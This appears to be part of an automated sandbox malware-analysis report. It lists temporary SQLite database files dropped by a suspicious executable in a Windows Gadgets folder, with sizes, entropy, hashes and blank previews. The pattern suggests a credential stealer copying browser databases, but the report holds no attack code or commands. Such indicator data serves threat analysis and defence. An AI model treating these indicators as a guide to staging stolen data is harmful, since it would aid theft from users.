                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Fm3JdgCx8n

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\GRHvCaAEhV

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\GwLKG5l6La

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\GwtbGQUdSc

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\HEECDbarJM

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\HZThiKVqjd

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\HsRn2t14YY

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                  Entropy (8bit):0.7873599747470391
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Ht7Uv3xIII

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Hv7fS015re

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                  Entropy (8bit):2.5793180405395284
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\I7tKZDCBzg

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\IKFo4aXHpv

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\IMI52KECxK

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5712781801655107
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\IR7friJ5NT

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\IqWdmjqrGg

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                  Entropy (8bit):2.5793180405395284
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\J3GFkCfwoU

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\JDBBAkcQbW

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\JHA4e5A5Wg

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\JNuXWDRQvn

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                  Entropy (8bit):0.7873599747470391
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\K4kqKo62BN

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                  Entropy (8bit):0.7873599747470391
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\KQjekrdomz

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                  Malicious:false
